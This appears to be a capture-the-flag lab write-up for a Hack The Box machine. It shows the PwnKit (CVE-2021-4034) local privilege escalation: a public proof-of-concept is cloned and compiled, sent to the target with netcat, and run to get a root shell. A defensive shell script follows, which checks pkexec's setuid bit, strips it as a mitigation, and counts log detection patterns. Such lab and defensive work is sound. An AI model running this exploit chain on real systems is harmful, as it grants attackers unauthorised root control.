CVE-2021-4034
PEAS discovered that the target system is vulnerable to CVE-2021-4034.
The vulnerable program is part of Polkit, which manages process privileges. Polkit's pkexec allows non-privileged processes to communicate with privileged ones and also instruments legitimate, authorized uses of privilege escalation, similar to sudo.
A memory corruption flaw is triggered when pkexec is invoked without any arguments. By manipulating environment variables, an attacker can trick pkexec into loading and executing arbitrary code with superuser privileges.
Exploit (PwnKit):
I found an exploit online.
pericles@time:/$ gcc
Command 'gcc' not found, but can be installed with:
apt install gcc
Please ask your administrator.
The target system does not have any compiler installed. I would need to compile the exploit on my own machine and transfer it over.
Docker Exploit Development
┌──(kali㉿kali)-[~/archive/htb/labs/time]
└─$ docker run -it --entrypoint "/bin/bash" --name timer ubuntu:20.04
root@5e6ac0a00f26:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git wget
Setting up the environment
root@5e6ac0a00f26:~# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Unpacking objects: 100% (92/92), 22.69 KiB | 968.00 KiB/s, done.
Downloading the exploit
root@5e6ac0a00f26:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
Compile exploit
root@5e6ac0a00f26:~/CVE-2021-4034# cd ../ ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
root@5e6ac0a00f26:~# nc 10.10.10.214 2222 < CVE-2021-4034.tar.gz
pericles@time:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.14.7 35768
pericles@time:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
Packaging & delivery complete
pericles@time:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
time
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.214 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:759a prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:759a prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:75:9a txqueuelen 1000 (Ethernet)
RX packets 144892 bytes 17846918 (17.8 MB)
RX errors 0 dropped 26 overruns 0 frame 0
TX packets 140110 bytes 10993435 (10.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 33286 bytes 2364926 (2.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 33286 bytes 2364926 (2.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
System Level Compromise
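For the defender's side of the two passages above (the flaw description, and the exploit run that lands a root shell), here is an added example that is not part of this writeup or of the berdav repository: a small POSIX shell script that checks the precondition PwnKit depends on (pkexec installed setuid), applies the interim mitigation of stripping that bit with chmod 0755 until the patched polkit package is installed, and counts the messages pkexec writes to the auth log (auth.log on Debian/Ubuntu, secure on RHEL-like systems) when its SHELL and environment-variable sanity checks trip, which common PoCs such as this one cause. The log lines, PIDs, user and paths in the script are constructed for illustration; point the functions at /usr/bin/pkexec and the real auth log on a live host.

```shell
#!/bin/sh
# Added defender-side example for CVE-2021-4034 (not part of the original
# writeup or of the berdav PoC). All paths and log lines are constructed.

# pkexec_has_setuid PATH: exit 0 if PATH exists and carries the setuid bit.
# Without setuid, an unpatched pkexec cannot hand out root.
pkexec_has_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# pkexec_mitigate PATH: strip the setuid bit (chmod 0755), the interim
# mitigation used until the fixed polkit package is installed.
pkexec_mitigate() {
    chmod 0755 "$1"
}

# count_pwnkit_indicators LOGFILE: number of lines in which pkexec complains
# about its environment. Both messages are pkexec's own sanity-check output;
# they are matched loosely ("in " optional, "sus...ious") so the check does
# not depend on the exact wording of a given polkit build.
count_pwnkit_indicators() {
    n=$(grep -c -E 'pkexec\[[0-9]+\]:.*(SHELL variable was not found (in )?the /etc/shells file|environment variable [A-Za-z0-9_]+ contains sus[a-z]+ content)' "$1") || true
    echo "${n:-0}"
}

# write_sample_log PATH: constructed auth.log excerpt, two pkexec indicator
# lines surrounded by ordinary noise. Host, user, PIDs and times are made up.
write_sample_log() {
    cat > "$1" <<'EOF'
Jan 1 10:00:01 time sshd[1201]: Accepted password for pericles from 10.0.0.5 port 50000 ssh2
Jan 1 10:00:07 time pkexec[1344]: pericles: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/dev/shm] [COMMAND=]
Jan 1 10:00:07 time pkexec[1345]: pericles: The value for environment variable XAUTHORITY contains suspicious content [USER=root] [TTY=unknown] [CWD=/dev/shm] [COMMAND=]
Jan 1 10:00:09 time sudo: pericles : command not allowed ; TTY=pts/0 ; PWD=/dev/shm ; USER=root ; COMMAND=/bin/bash
EOF
}

# Stand-alone demo on the constructed log. On a real host run instead:
#   count_pwnkit_indicators /var/log/auth.log
#   pkexec_has_setuid /usr/bin/pkexec && pkexec_mitigate /usr/bin/pkexec
demo_dir=$(mktemp -d)
write_sample_log "$demo_dir/auth.log"
echo "pkexec indicator lines: $(count_pwnkit_indicators "$demo_dir/auth.log")"
rm -rf "$demo_dir"
```

Two caveats for anyone using this operationally: the setuid check tells you whether the exploit precondition holds, not whether the binary is patched, so the proper fix remains updating polkit; and the vulnerability can also be exploited without triggering either log message, so a count of zero is evidence, not proof, that nothing happened.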